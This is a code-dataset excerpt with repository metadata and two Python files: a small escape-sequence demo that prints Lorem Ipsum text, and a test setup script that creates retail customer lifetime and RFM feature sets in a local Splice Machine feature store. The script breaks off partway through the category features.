| 0
| 0
| 7
| 174411281e4ef145d47081ba2e15a076f026de82
| 338
| py
| Python
| String_Programs/escapeChar.py
| saratkumar17mss040/Python-lab-programs
| a2faa190acaaa30d92d4c801fd53fdc668c3c394
| ["MIT"] | 3
| 2020-08-26T15:29:18.000Z
| 2020-09-03T13:49:13.000Z
| String_Programs/escapeChar.py
| saratkumar17mss040/Python-lab-programs
| a2faa190acaaa30d92d4c801fd53fdc668c3c394
| ["MIT"] | null | null | null
| String_Programs/escapeChar.py
| saratkumar17mss040/Python-lab-programs
| a2faa190acaaa30d92d4c801fd53fdc668c3c394
| ["MIT"] | null | null | null |
# escape sequence character
def escapeChar():
    return "\t lorem Ipsum is simply dummy text of the printing and typesetting industry.\n \t Lorem Ipsum has been the industry's standard dummy text ever since the 1500s,\n \t when an unknown printer took a galley of type and scrambled it to make a type specimen book."


print(escapeChar())
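# When run as a script, the call above prints the sample text once, with each \t and \n
# escape sequence rendered as a literal tab or line break.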
| 56.333333
| 271
| 0.772189
| 57
| 338
| 4.578947
| 0.736842
| 0.045977
| 0.084291
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014286
| 0.171598
| 338
| 5
| 272
| 67.6
| 0.917857
| 0.073965
| 0
| 0
| 0
| 0.333333
| 0.826923
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0.333333
| 0.666667
| 0.666667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 8
| bd58e235ee74aeace242e145efa7a1164775294f
| 77,711
| py
| Python
| feature_store/src/test/env_setup/create_feature_set.py
| myles-novick/ml-workflow
| 2f9a0d3d2814941c6bd78f9dcc019870a4e8c2da
| ["Apache-2.0"] | null | null | null
| feature_store/src/test/env_setup/create_feature_set.py
| myles-novick/ml-workflow
| 2f9a0d3d2814941c6bd78f9dcc019870a4e8c2da
| ["Apache-2.0"] | null | null | null
| feature_store/src/test/env_setup/create_feature_set.py
| myles-novick/ml-workflow
| 2f9a0d3d2814941c6bd78f9dcc019870a4e8c2da
| ["Apache-2.0"] | null | null | null |
from splicemachine.features import FeatureStore, FeatureType
fs = FeatureStore()
fs.set_feature_store_url('http://localhost:8000')
fs.login_fs('local','testing')
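# NOTE: the URL and the 'local'/'testing' credentials above are placeholder values for a
# local test environment; point set_feature_store_url() at your own feature store service
# before running this setup script elsewhere.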
try:
    fs.remove_feature_set('retail_fs','customer_lifetime', purge=True)
except Exception:
    print('Feature set does not exist')
# create customer lifetime metrics feature set
fs.create_feature_set(schema_name='retail_fs',table_name='customer_lifetime', primary_keys = {"CUSTOMERID":"INTEGER"}, desc='Describes customer with aggregates of their lifetime activity.')
# add customer lifetime features
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_ACTIVE_DAYS', desc='Number of distinct days in which customer has placed orders.', feature_data_type='INTEGER', feature_type=FeatureType.continuous, tags=['Customer','Count','Active Days'], attributes={'Usefulness': "High"})
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_QTY', desc='Total lifetime number of units purchased.', feature_data_type='INTEGER', feature_type=FeatureType.continuous, tags=['Customer','Lifetime','Active Days'])
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_ITEMS_PER_ACTIVE_DAY', desc='Total lifetime average number of units purchased per active day.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=['Customer','Average','Active Days'], attributes = {'Feature quality': "Meh", 'Value':'Low'})
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_REVENUE_PER_ACTIVE_DAY', desc='Total lifetime average revenue per active day.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=['Customer','Revenue','Active Days'], attributes = {'Calculation frequency': "Monthly"})
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_DAYS', desc='Length of customer relationship in days.', feature_data_type='INTEGER', feature_type=FeatureType.continuous, tags=['Customer','Relationship'])
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_DAYS_SINCE_PURCHASE', desc='Days since customer made a purchase.', feature_data_type='INTEGER', feature_type=FeatureType.continuous, attributes = {'Feature quality': "Great", 'Foo':'bar'})
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_VALUE', desc='Total revenue over customer lifetime.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=['Revenue','Sum'])
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_START_DATE', desc='First invoice date for customer.', feature_data_type='DATE', feature_type=FeatureType.categorical, tags=['Invoice'])
fs.deploy_feature_set('retail_fs','customer_lifetime')
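# The script defines every customer_lifetime feature first and deploys the finished feature
# set as the final step above.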
try:
    fs.remove_feature_set('retail_fs','customer_rfm_by_category', purge=True)
except Exception:
    print('Feature set does not exist')
# create customer RFM profile feature set
fs.create_feature_set(schema_name='retail_fs',table_name='customer_rfm_by_category', primary_keys = {"CUSTOMERID":"INTEGER"}, desc='Describes customer by aggregating their purchases by category over multiple time windows with weekly granularity. All metrics are expressed as weekly rates keeping them within the same domain across time windows.')
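# The RFM features below follow a fixed naming pattern: CUSTOMER_RFM_<CATEGORY>_RATE_<N>W for
# weekly unit-purchase rates and CUSTOMER_RFM_<CATEGORY>_REVN_RATE_<N>W for weekly revenue rates,
# each defined over 1, 2, 4, 8, 16, 32 and 52 week windows per product category.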
# add unit rates per category features to the RFM profile
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_1W', desc='Last weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"1"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_2W', desc='Last 2 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"2"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_4W', desc='Last 4 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"4"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_8W', desc='Last 8 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"8"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_16W', desc='Last 16 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"16"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_32W', desc='Last 32 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"32"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_52W', desc='Last 52 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"52"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_1W', desc='Last weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"1"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_2W', desc='Last 2 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"2"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_4W', desc='Last 4 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"4"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_8W', desc='Last 8 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"8"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_16W', desc='Last 16 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"16"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_32W', desc='Last 32 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"32"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_52W', desc='Last 52 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"52"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_1W', desc='Last weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"1"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_2W', desc='Last 2 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"2"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_4W', desc='Last 4 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"4"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_8W', desc='Last 8 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"8"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_16W', desc='Last 16 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"16"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_32W', desc='Last 32 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"32"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_52W', desc='Last 52 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"52"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_1W', desc='Last weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Home","TimeGranularity":"Week","WindowLength":"1"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_2W', desc='Last 2 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_4W', desc='Last 4 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_8W', desc='Last 8 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_16W', desc='Last 16 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_32W', desc='Last 32 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_RATE_52W', desc='Last 52 weeks units purchased count in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_1W', desc='Last weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_2W', desc='Last 2 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_4W', desc='Last 4 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_8W', desc='Last 8 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_16W', desc='Last 16 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_32W', desc='Last 32 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_RATE_52W', desc='Last 52 weeks units purchased count in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_1W', desc='Last weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_2W', desc='Last 2 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_4W', desc='Last 4 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_8W', desc='Last 8 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_16W', desc='Last 16 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_32W', desc='Last 32 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_RATE_52W', desc='Last 52 weeks units purchased count in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_1W', desc='Last weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_2W', desc='Last 2 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_4W', desc='Last 4 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_8W', desc='Last 8 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_16W', desc='Last 16 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_32W', desc='Last 32 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_RATE_52W', desc='Last 52 weeks units purchased count in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_1W', desc='Last weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_2W', desc='Last 2 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_4W', desc='Last 4 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_8W', desc='Last 8 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_16W', desc='Last 16 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_32W', desc='Last 32 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_RATE_52W', desc='Last 52 weeks units purchased count in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_1W', desc='Last weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_2W', desc='Last 2 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_4W', desc='Last 4 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_8W', desc='Last 8 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_16W', desc='Last 16 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","16"])
